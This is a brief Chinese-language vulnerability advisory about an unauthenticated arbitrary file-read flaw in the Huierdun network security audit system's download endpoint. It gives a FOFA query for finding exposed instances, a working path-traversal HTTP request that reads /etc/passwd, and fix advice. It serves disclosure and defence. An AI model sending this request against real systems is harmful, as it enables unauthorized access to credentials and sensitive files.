0x01 產(chǎn)品簡介

惠爾頓網(wǎng)絡(luò)安全審計產(chǎn)品致力于滿足軍工四證、軍工保密室建設(shè)、國家涉密網(wǎng)絡(luò)建設(shè)的審計要求，規(guī)范網(wǎng)絡(luò)行為，滿足國家的規(guī)范；支持1-3線路的internet接入、1-3對網(wǎng)橋；含強(qiáng)大的上網(wǎng)行為管理、審計、監(jiān)控模塊；用戶訪問功能，內(nèi)容過濾功能；流量控制功能、帶寬管理功能；增強(qiáng)的應(yīng)用安全擴(kuò)展；強(qiáng)大的應(yīng)用協(xié)議分析與報表功能。

0x02 漏洞概述

惠爾頓 網(wǎng)絡(luò)安全審計系統(tǒng)download接口存在任意文件讀取漏洞，未經(jīng)身份驗證的攻擊者可利用此漏洞讀取系統(tǒng)內(nèi)部敏感文件及憑證，使系統(tǒng)處于極不安全的狀態(tài)。

0x03?影響范圍

version <= v10

0x04 復(fù)現(xiàn)環(huán)境

FOFA：app="惠爾頓-網(wǎng)絡(luò)安全審計系統(tǒng)"

0x05 漏洞復(fù)現(xiàn)

PoC

GET /download/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

讀取 /etc/passwd 文件

0x06 修復(fù)建議

關(guān)閉互聯(lián)網(wǎng)暴露面或接口設(shè)置訪問權(quán)限

升級至安全版本